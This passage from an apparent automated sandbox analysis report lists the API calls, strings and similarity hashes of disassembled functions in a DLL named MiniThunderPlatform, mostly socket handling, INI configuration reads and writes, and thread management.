                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@?assign@?$basic_string@V12@V12@@$ErrorEventH_prologLastSelectV01@@rand
                                                                                                                                              • String ID: .\connect_manager.cpp$_connecting_queue.count(event_handle)$_connecting_queue[event_handle]._ip_addresses.size()$socket_handle$thunder_assert
                                                                                                                                              • API String ID: 404502743-3806849883
                                                                                                                                              • Opcode ID: 129e4488700a7ed2dc223e724a33264992432e397d592e59593f5f0fcf082126
                                                                                                                                              • Instruction ID: c55c3649b2bea4f1d59166695540d6be5d6b019f00561068088513303db69d21
                                                                                                                                              • Opcode Fuzzy Hash: 129e4488700a7ed2dc223e724a33264992432e397d592e59593f5f0fcf082126
                                                                                                                                              • Instruction Fuzzy Hash: A971CF76A043019FC759DF69CC8981BB3EAFBD9602F45492CF586CB652E730F8848B52
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000024,?,?,10241B80,000000FF,1002693A,?,?,?,00000000,?), ref: 10026730
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10026745
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10026757
                                                                                                                                                • Part of subcall function 100264F0: ??3@YAXPAX@Z.MSVCR71(?,?,?), ref: 100265B2
                                                                                                                                              • GetPrivateProfileSectionA.KERNEL32(download,?,00001000,?), ref: 10026795
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100267B6
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(00000000,00000000,00000001), ref: 100267CE
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 100267E2
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10026809
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002682F
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000001,?), ref: 10026859
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002689C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100268AE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100268C3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@V12@$?assign@?$basic_string@$??3@??4?$basic_string@?find@?$basic_string@PrivateProfileSectionV01@
                                                                                                                                              • String ID: =$download
                                                                                                                                              • API String ID: 3715501202-3164794696
                                                                                                                                              • Opcode ID: 9bd88b41d5f3f15470b66bc0ceb1508f9e777e5ea61bfd2d9953bd955a8bb551
                                                                                                                                              • Instruction ID: a023fef14ca76dd256c44445d69db1caa8ef777c0480d3de8aa82a65973d040d
                                                                                                                                              • Opcode Fuzzy Hash: 9bd88b41d5f3f15470b66bc0ceb1508f9e777e5ea61bfd2d9953bd955a8bb551
                                                                                                                                              • Instruction Fuzzy Hash: FD51D1351083859FD724CF64D89CBEABBE4EB99744F40491CF5CA83282DBB0658DCB62
                                                                                                                                              APIs
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,00000000), ref: 1021AC86
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(last thread not stopped, now startanother thread at one thread obj), ref: 1021AC99
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6BA0), ref: 1021ACC2
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 1021ACCB
                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000), ref: 1021ACD6
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0021AB50,00000000,00000000,0000000C), ref: 1021ACEC
                                                                                                                                              • __RTtypeid.MSVCR71(00000000), ref: 1021ACF6
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71 ref: 1021AD1E
                                                                                                                                              • ?name@type_info@@QBEPBDXZ.MSVCR71(-00000004,?), ref: 1021AD66
                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(dl_crt,-00000006), ref: 1021AD75
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AD87
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AD9C
                                                                                                                                              Strings
                                                                                                                                              • dl_crt, xrefs: 1021AD70
                                                                                                                                              • last thread not stopped, now startanother thread at one thread obj, xrefs: 1021AC90
                                                                                                                                              • error.dat, xrefs: 1021AD0A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$??0exception@@?name@type_info@@CloseCreateEventExceptionH_prologHandleObjectPrivateProfileResetSingleStringThreadThrowTtypeidV01@V01@@WaitWriteY?$basic_string@
                                                                                                                                              • String ID: dl_crt$error.dat$last thread not stopped, now startanother thread at one thread obj
                                                                                                                                              • API String ID: 3196620889-3090114385
                                                                                                                                              • Opcode ID: a1172def8e7be8627b62b2eadf164501b651cf94c5c867666823416be0018870
                                                                                                                                              • Instruction ID: 2e941530730813ec7dba99eaa6cd3383bc57037a6a2da6aa8cd2b20ed6a84487
                                                                                                                                              • Opcode Fuzzy Hash: a1172def8e7be8627b62b2eadf164501b651cf94c5c867666823416be0018870
                                                                                                                                              • Instruction Fuzzy Hash: 824167755083509FD724CB24CC8DF9BB7E8FB99705F008A1DF49A87291EB34A584CBA2
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100B23A3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B23B4
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B23EB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2400
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B2424
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2438
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000001,00000000), ref: 100B246D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100B251F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2531
                                                                                                                                                • Part of subcall function 100EA175: __EH_prolog.LIBCMT ref: 100EA17A
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100B2373,00000000), ref: 100EA19B
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1AB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1BB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1CB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1DB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1EB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1FB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA20B
                                                                                                                                                • Part of subcall function 10028CA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 10028CB3
                                                                                                                                                • Part of subcall function 10028CA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 10028CC4
                                                                                                                                                • Part of subcall function 10028CA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 10028CD5
                                                                                                                                                • Part of subcall function 10028CA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 10028CE6
                                                                                                                                                • Part of subcall function 10028CA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 10028CFF
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100B25CF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B25E1
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B262E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2640
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000014), ref: 100B265D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000014), ref: 100B267A
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100B2697
                                                                                                                                                • Part of subcall function 10027700: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?,?,?,100291DB,00000000), ref: 1002771C
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027729
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027736
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027743
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027750
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1002775F
                                                                                                                                                • Part of subcall function 10023953: __EH_prolog.LIBCMT ref: 10023958
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023971
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002397E
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002398B
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023998
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239A5
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239B1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$V12@$??1?$basic_string@?assign@?$basic_string@$V12@@$??0?$basic_string@$??$?8D@1@@std@@D@2@@0@0@V?$basic_string@$H_prolog$?erase@?$basic_string@CountTickmalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 11785127-0
                                                                                                                                              • Opcode ID: 8d3e04fe36587c4058921bb59956b6523b6b58e84e411f8080a2238fa27b8b05
                                                                                                                                              • Instruction ID: 77d7ac40d7ed6bddd494c4f64e911cbd7309919fef919df3b4a059535bef345c
                                                                                                                                              • Opcode Fuzzy Hash: 8d3e04fe36587c4058921bb59956b6523b6b58e84e411f8080a2238fa27b8b05
                                                                                                                                              • Instruction Fuzzy Hash: 2BE126755087819FD365DF24C898BDBBBE8FF98304F408A5DE49E83291DB30A648CB52
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100C846E
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100C84BE
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C850D
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100C8514
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C851B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C852C
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100C853B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C8585
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100C859A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??$?6??1?$basic_string@D@std@@@0@V10@V?$basic_ostream@$??0?$basic_stringstream@??6?$basic_ostream@?str@?$basic_stringstream@CountD?$basic_stringstream@D@2@@2@TickV01@V?$basic_string@
                                                                                                                                              • String ID: do_connect error$ no:
                                                                                                                                              • API String ID: 564511375-1570947973
                                                                                                                                              • Opcode ID: 52512c8700c68407e96950eb092d139caa4e713b565e491d48ecdcb8882d600d
                                                                                                                                              • Instruction ID: 9655eb201cb78beb98068f7c408035a3a2be131c17463bfe10d392761212c88f
                                                                                                                                              • Opcode Fuzzy Hash: 52512c8700c68407e96950eb092d139caa4e713b565e491d48ecdcb8882d600d
                                                                                                                                              • Instruction Fuzzy Hash: BC4167752043809FD364DB24CC98F9BBBE8FB99710F008A5DF49A83291DB74A548CB62
                                                                                                                                              APIs
                                                                                                                                              • socket.WS2_32(00000002,00000002,00000000), ref: 1005134E
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 1005135C
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051397
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create socket object error), ref: 1005136D
                                                                                                                                                • Part of subcall function 1021ADF0: ??0exception@@QAE@XZ.MSVCR71(?,00000000), ref: 1021AE10
                                                                                                                                                • Part of subcall function 1021ADF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE35
                                                                                                                                                • Part of subcall function 1021ADF0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE47
                                                                                                                                                • Part of subcall function 1021ADF0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1021AE66
                                                                                                                                                • Part of subcall function 1021ADF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AE75
                                                                                                                                              • WSAIoctl.WS2_32(?,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 100513D0
                                                                                                                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,?,00000001), ref: 100513ED
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100513F8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(setsockopt error), ref: 10051409
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051433
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ErrorExceptionLastThrow$??0exception@@??1?$basic_string@?append@?$basic_string@IoctlV01@V01@@V12@V12@@Y?$basic_string@setsockoptsocket
                                                                                                                                              • String ID: create socket object error$setsockopt error
                                                                                                                                              • API String ID: 2731679550-3766369964
                                                                                                                                              • Opcode ID: f26c13ef510b77c063b38a6a17bdd2b0e1adaa04e4cc276f45583294638e64e2
                                                                                                                                              • Instruction ID: 559b7226851620ae625c7e41a9265a0b6a6f165be21cf5ae3dbdcb24e27fc5e9
                                                                                                                                              • Opcode Fuzzy Hash: f26c13ef510b77c063b38a6a17bdd2b0e1adaa04e4cc276f45583294638e64e2
                                                                                                                                              • Instruction Fuzzy Hash: 2B316875144741AFD320DB60CC49F9BB7E8EB89710F504B1CF6A6962D0DBB4A588CB62
                                                                                                                                              APIs
                                                                                                                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,Function_00035BD0), ref: 10048929
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10048934
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn read request error), ref: 10048970
                                                                                                                                                • Part of subcall function 1021ADF0: ??0exception@@QAE@XZ.MSVCR71(?,00000000), ref: 1021AE10
                                                                                                                                                • Part of subcall function 1021ADF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE35
                                                                                                                                                • Part of subcall function 1021ADF0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE47
                                                                                                                                                • Part of subcall function 1021ADF0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1021AE66
                                                                                                                                                • Part of subcall function 1021ADF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AE75
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,00000000), ref: 10048993
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
